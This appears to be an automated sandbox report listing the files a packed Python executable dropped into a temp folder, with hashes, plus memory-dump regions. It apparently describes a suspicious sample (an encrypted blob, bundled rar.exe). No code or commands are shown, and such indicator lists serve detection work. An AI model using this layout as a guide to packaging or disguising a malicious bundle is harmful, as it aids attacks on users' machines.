0e073381a340db3f95165dbcceb8dfbf1ed1b4343e860446032400a7b321b7922c42ee5d9a881e28e69a3f55d56d63663adb9bb5abb69c5306efbf116cc5e456

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-core-util-l1-1-0.dll

Filesize
21KB

MD5
3c58a804b90a0782e80bbbf6c6b6f167

SHA1
b333143e0f6e508b51d27adf7872b586fa54c794

SHA256
6eda016742a6171205a387a14b3c0b331841567740376f56768f8c151724207d

SHA512
773f8deded48b34babe24d955a501f4f357c20125affb6eade36ce6a7acd380906713c366318f79d627747e636d156875c216fffac26dba25373bbc1c820da76

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-conio-l1-1-0.dll

Filesize
21KB

MD5
5794b8e183eb547aadd5faf30a8c4dd2

SHA1
5b1ed8a9da14d8ecc4209662809727931aa49307

SHA256
b762061b688aae679afe788904d2c9970f74a7dac98f3b42463d08f25e483d3f

SHA512
3e896854e5dd957ab2b88c82fbaf2eaa03729bab30fd8518bd999081f4da9000d9b22894b324e5930df161c7adaec3fc87fd00de60dcda34876007aea4a2fd31

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-convert-l1-1-0.dll

Filesize
25KB

MD5
3560176d0cdbe2f5d33f543348e0a027

SHA1
1e35a1f7793fc3899927835491f28fe5b903edcd

SHA256
ebb2ae5535a64f65daeab8235585114fc9dd2cf1a49f5852d446250b998b6ae4

SHA512
8ab24c8c9fe8331f21be96818c5fa69ae5578eb742c4504596310bb0db7c4c087d350fa47a13ed9ff2e051bb62ac5581de082d0177923d24fee6b140afecf50b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-environment-l1-1-0.dll

Filesize
21KB

MD5
e93c7f013493b12ad40229b19db02ce6

SHA1
ef878bfbfd2f8328bbb8cff1aa29a39e624a8503

SHA256
17d63275d00bdd8670422b95bd264c532998e0a1b041079e54fce4b6b7a55819

SHA512
2f4a25ea4062840bea10442cad665a72abbce747307ad9ce7b3bb89eaf7dcc28f1e9396749576be304fd793690ddc445653613440442695e72b761eacacb6020

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-filesystem-l1-1-0.dll

Filesize
21KB

MD5
47555752931cecf90e796499b62ec729

SHA1
217b171764fba5e91190d1f8a36feccb3f6d4585

SHA256
9a9e2a65a281644e368d0f272b95ba5f6b445d1c35910d06056c5ebeb77402db

SHA512
a68009f0306d4d8e70951978d2c184eb80fbec98c6db0997bd7b0b503dd63019363cfef68a9adbfb568c0a552b774fbdbeb1bcf45f211a6a3224b49e85a5619c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-heap-l1-1-0.dll

Filesize
21KB

MD5
527bbbfded529ea77ee798d94ce0f243

SHA1
647f8c89eb4db3cf3656292b3de984b32c6e02a5

SHA256
bab9ac3ec83e380ae51e4295ef3bf2c738627812d3a49d1e713661abbc8dc57a

SHA512
c1ed69e15ab19084390cf9d1ceab791758ac4ddd688169f3b814b0e4cf1fc3b6ba17651e35b25dcdc601a8a64821d58933d52a5e939942fa134dfd04fca04c8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-locale-l1-1-0.dll

Filesize
21KB

MD5
09796dab12cbbd920f632aeb89820193

SHA1
7d81c0e5537b6d8b79af0c28cd102e064027c78d

SHA256
bd14c67ea28e21d6257ad780a37122c9b5773f69e693f5db6bffaee4d839526e

SHA512
09a6175dccbbd18a62209e156089f1167dfb8040c97c8c2c14724ce2a8fbe6ce039d7fe04fb8bd60092427beb7fdd8e7127d611f006fff1cf2a1ad75e9e5ef3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-math-l1-1-0.dll

Filesize
29KB

MD5
aa9624cb27cc50a3fbbd3b223a617b1c

SHA1
797aea1c5cedd1125276bfc5dcd7a3fb8c6355aa

SHA256
606d66d82db562ea7979179d06486a0f94d079941d26b80a1e2c49d29959df6f

SHA512
024975e6787f7a6b0ab6e4b02ad33901f8473b97dc73d4f03b7a116b24ac74150c0c48990ea7a4fb750f9fe728dafed172796743f802e70f2150eefcf70fe96a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-process-l1-1-0.dll

Filesize
21KB

MD5
9d6925407136753e8eb8234d59fa3f1f

SHA1
62631b7007d394fb4d406ea686b291fff9e486cd

SHA256
f6156b1020380ec4f0e48577ebedaaef5fb1ab1f337d8b4e72e6a33a7567a9cc

SHA512
ab04de62524e465810cd0ee81e85018863e276d49861e67a920667af802e94869b816b47a6e3c4738179a7a7d726d44bbba6e47d9097363a63eaff51cd56de8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-runtime-l1-1-0.dll

Filesize
25KB

MD5
bbaa58e9e1abdf7d8c4c69652d29d789

SHA1
38aef13abc14502354e8c5c3c37b97a8e2e5fdcf

SHA256
c5902934d026d7e15fbe9917d474f3322846a41a25e66f4b2b1f758801879f4b

SHA512
7882a8e1e1ea7e217f70ff9df27d36709b4be23588909ef002f3eb1b9a7d3eea2591a8524af2c83448ddfff0911658517c6989683245c54678583f359a78b0ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-stdio-l1-1-0.dll

Filesize
25KB

MD5
ef37235fc43157a4c93241d5e49e304b

SHA1
d4de26b36812c2ddccd1618b4d7ac02ad1b42273

SHA256
a9c5a153d8c0286f9b41a2b1c65854ad9e6471b8755b7de87bae4470e60bcab6

SHA512
c0857760d5d069beeb1eb1737f4160530910331bf6047022836cf58137bd28c2a966a8760a681859f57ebd810fd424ce231402eddde1316eaef7b6f9f773afbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-string-l1-1-0.dll

Filesize
25KB

MD5
639b1fb35cb61ba633eb1791b750631f

SHA1
392a6925009f5fb02a4c122c9ce31d82b9059628

SHA256
25b8f83a7767211b11132775a0e27a45aa4ec8ab4e6572599f9c172ae3606b40

SHA512
def547ef66673862cea9bb13c433edce24a3075c328d9b3b9452f2f01f2f4243daab38c0f8571c52d601bc4aecaaa0682dbebf6be41cae345787a719063ebf58

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-time-l1-1-0.dll

Filesize
21KB

MD5
fccce207a34c947f01d3f23a7dd09569

SHA1
75f722801c77285db98a08af763252a0255e99e2

SHA256
7c7f6393f06de11750adb09cc5698ae55cd9fb27b2e51e207286feb1b5b2b156

SHA512
d3d923f133594eb4325f4a6e5ed46fcc348a7c0f310f14eaa38c6fad070ba637bdb4a77200feb231114e111d07a86595a6130291028cde3a284d9f847ec38ad4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\api-ms-win-crt-utility-l1-1-0.dll

Filesize
21KB

MD5
708a5bc205384633a7b6674eecc7f0f0

SHA1
01603a7826029293236c67fce02ace8d392a0514

SHA256
d8ba5f17b9ffcbf3aeaf3fa1da226832d2fa90f81acce0cd669464e76ce434ac

SHA512
8638845326ab6543338baa7a644af8be33a123e1fc9da2037158be7c8d165691ccd06cb3ff73696a30b8801eab030e81f93db81216bb3b7e83a320a0df5af270

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\base_library.zip

Filesize
1.3MB

MD5
18c3f8bf07b4764d340df1d612d28fad

SHA1
fc0e09078527c13597c37dbea39551f72bbe9ae8

SHA256
6e30043dfa5faf9c31bd8fb71778e8e0701275b620696d29ad274846676b7175

SHA512
135b97cd0284424a269c964ed95b06d338814e5e7b2271b065e5eabf56a8af4a213d863dd2a1e93c1425fadb1b20e6c63ffa6e8984156928be4a9a2fbbfd5e93

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\blank.aes

Filesize
109KB

MD5
0de6249dfa2f440a11a0bc77507064ba

SHA1
33b5abededb6786e1ade59a5d2f47ea7fb3a389b

SHA256
ea65b3c1b47f775b94a2e572168bf993a9a649e807b4ad9460da1a9b0abb1cd4

SHA512
6f1953ca694328a6b04e28f2c15c2c59a6398895cdf9e915e06240198a57fd34fa8c427a0769805d98b9f3207fe5025c03d4985da0baff20c24db4a6c7edcbb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\bound.blank

Filesize
6.2MB

MD5
2c2c83cdbf73843850579279e85e139c

SHA1
8d7bce504816f9dcfad2aa3d97e62d169371f163

SHA256
af07baac628ea777f8ced56de8886b91e901d36961ec4a85d65140ce02e018d0

SHA512
73789cbc95a89e2289a1caaaded896efa565f1bc866a2923a147f51694fe1430c5812530af62de20015327d867bd2f5819e8f2fd899f1599b21f232c6f198314

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\libcrypto-3.dll

Filesize
1.6MB

MD5
8377fe5949527dd7be7b827cb1ffd324

SHA1
aa483a875cb06a86a371829372980d772fda2bf9

SHA256
88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

SHA512
c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\libssl-3.dll

Filesize
221KB

MD5
b2e766f5cf6f9d4dcbe8537bc5bded2f

SHA1
331269521ce1ab76799e69e9ae1c3b565a838574

SHA256
3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

SHA512
5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\python313.dll

Filesize
1.8MB

MD5
9a3d3ae5745a79d276b05a85aea02549

SHA1
a5e60cac2ca606df4f7646d052a9c0ea813e7636

SHA256
09693bab682495b01de8a24c435ca5900e11d2d0f4f0807dae278b3a94770889

SHA512
46840b820ee3c0fa511596124eb364da993ec7ae1670843a15afd40ac63f2c61846434be84d191bd53f7f5f4e17fad549795822bb2b9c792ac22a1c26e5adf69

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\select.pyd

Filesize
26KB

MD5
933da5361079fc8457e19adab86ff4e0

SHA1
51bccf47008130baadd49a3f55f85fe968177233

SHA256
adfdf84ff4639f8a921b78a2efce1b89265df2b512df05ce2859fc3cc6e33eff

SHA512
0078cd5df1b78d51b0acb717e051e83cb18a9daf499a959da84a331fa7a839eefa303672d741b29ff2e0c34d1ef3f07505609f1102e9e86fab1c9fd066c67570

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\sqlite3.dll

Filesize
645KB

MD5
ff62332fa199145aaf12314dbf9841a3

SHA1
714a50b5351d5c8afddb16a4e51a8998f976da65

SHA256
36e1c70afc8ad8afe4a4f3ef4f133390484bca4ea76941cc55bac7e9df29eefd

SHA512
eeff68432570025550d4c205abf585d2911e0ff59b6eca062dd000087f96c7896be91eda7612666905445627fc3fc974aea7c3428a708c7de2ca14c7bce5cca5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\ucrtbase.dll

Filesize
1.3MB

MD5
286b308df8012a5dfc4276fb16dd9ccc

SHA1
8ae9df813b281c2bd7a81de1e4e9cef8934a9120

SHA256
2e5fb14b7bf8540278f3614a12f0226e56a7cc9e64b81cbd976c6fcf2f71cbfb

SHA512
24166cc1477cde129a9ab5b71075a6d935eb6eebcae9b39c0a106c5394ded31af3d93f6dea147120243f7790d0a0c625a690fd76177dddab2d2685105c3eb7b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19042\unicodedata.pyd

Filesize
262KB

MD5
867ecde9ff7f92d375165ae5f3c439cb

SHA1
37d1ac339eb194ce98548ab4e4963fe30ea792ae

SHA256
a2061ef4df5999ca0498bee2c7dd321359040b1acf08413c944d468969c27579

SHA512
0dce05d080e59f98587bce95b26a3b5d7910d4cb5434339810e2aae8cfe38292f04c3b706fcd84957552041d4d8c9f36a1844a856d1729790160cef296dccfc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40jerkvu.0n0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/884-166-0x000001F3A5000000-0x000001F3A5022000-memory.dmp

Filesize
136KB

Download
memory/948-306-0x00000229FCED0000-0x00000229FCED8000-memory.dmp

Filesize
32KB

Download
memory/1876-176-0x00007FFEB9270000-0x00007FFEB9272000-memory.dmp

Filesize
8KB

Download
memory/1876-177-0x0000000140000000-0x0000000140E35000-memory.dmp

Filesize
14.2MB

Download
memory/3112-144-0x00007FFE9A330000-0x00007FFE9A863000-memory.dmp

Filesize
5.2MB

Download
memory/3112-137-0x00007FFEAE300000-0x00007FFEAE319000-memory.dmp

Filesize
100KB

Download
memory/3112-140-0x00007FFEAB850000-0x00007FFEAB869000-memory.dmp

Filesize
100KB

Download
memory/3112-141-0x00007FFEAB840000-0x00007FFEAB84D000-memory.dmp

Filesize
52KB

Download
memory/3112-143-0x00007FFEAB380000-0x00007FFEAB3B3000-memory.dmp

Filesize
204KB

Download
memory/3112-142-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp

Filesize
6.4MB

Download
memory/3112-77-0x00007FFEAE3A0000-0x00007FFEAE3C7000-memory.dmp

Filesize
156KB

Download
memory/3112-146-0x00007FFEAAC60000-0x00007FFEAAD2E000-memory.dmp

Filesize
824KB

Download
memory/3112-145-0x00000208FC3D0000-0x00000208FC903000-memory.dmp

Filesize
5.2MB

Download
memory/3112-148-0x00007FFEAB360000-0x00007FFEAB374000-memory.dmp

Filesize
80KB

Download
memory/3112-147-0x00007FFEAE3A0000-0x00007FFEAE3C7000-memory.dmp

Filesize
156KB

Download
memory/3112-149-0x00007FFEAB480000-0x00007FFEAB48D000-memory.dmp

Filesize
52KB

Download
memory/3112-154-0x00007FFEAE3D0000-0x00007FFEAE3FB000-memory.dmp

Filesize
172KB

Download
memory/3112-155-0x00007FFEAA270000-0x00007FFEAA323000-memory.dmp

Filesize
716KB

Download
memory/3112-138-0x00007FFEAE250000-0x00007FFEAE275000-memory.dmp

Filesize
148KB

Download
memory/3112-139-0x00007FFE9AFE0000-0x00007FFE9B15F000-memory.dmp

Filesize
1.5MB

Download
memory/3112-136-0x00007FFEAE3D0000-0x00007FFEAE3FB000-memory.dmp

Filesize
172KB

Download
memory/3112-71-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp

Filesize
6.4MB

Download
memory/3112-250-0x00007FFEAE300000-0x00007FFEAE319000-memory.dmp

Filesize
100KB

Download
memory/3112-295-0x00007FFEAE250000-0x00007FFEAE275000-memory.dmp

Filesize
148KB

Download
memory/3112-298-0x00007FFE9AFE0000-0x00007FFE9B15F000-memory.dmp

Filesize
1.5MB

Download
memory/3112-301-0x00007FFEAB850000-0x00007FFEAB869000-memory.dmp

Filesize
100KB

Download
memory/3112-78-0x00007FFEAE390000-0x00007FFEAE39F000-memory.dmp

Filesize
60KB

Download
memory/3112-308-0x00007FFEAB840000-0x00007FFEAB84D000-memory.dmp

Filesize
52KB

Download
memory/3112-312-0x00007FFE9A330000-0x00007FFE9A863000-memory.dmp

Filesize
5.2MB

Download
memory/3112-313-0x00000208FC3D0000-0x00000208FC903000-memory.dmp

Filesize
5.2MB

Download
memory/3112-311-0x00007FFEAB380000-0x00007FFEAB3B3000-memory.dmp

Filesize
204KB

Download
memory/3112-323-0x00007FFEAAC60000-0x00007FFEAAD2E000-memory.dmp

Filesize
824KB

Download
memory/3112-324-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp

Filesize
6.4MB

Download
memory/3112-409-0x00007FFE9AFE0000-0x00007FFE9B15F000-memory.dmp

Filesize
1.5MB

Download
memory/3112-403-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp

Filesize
6.4MB

Download
memory/3112-438-0x00007FFE9A870000-0x00007FFE9AED5000-memory.dmp

Filesize
6.4MB

Download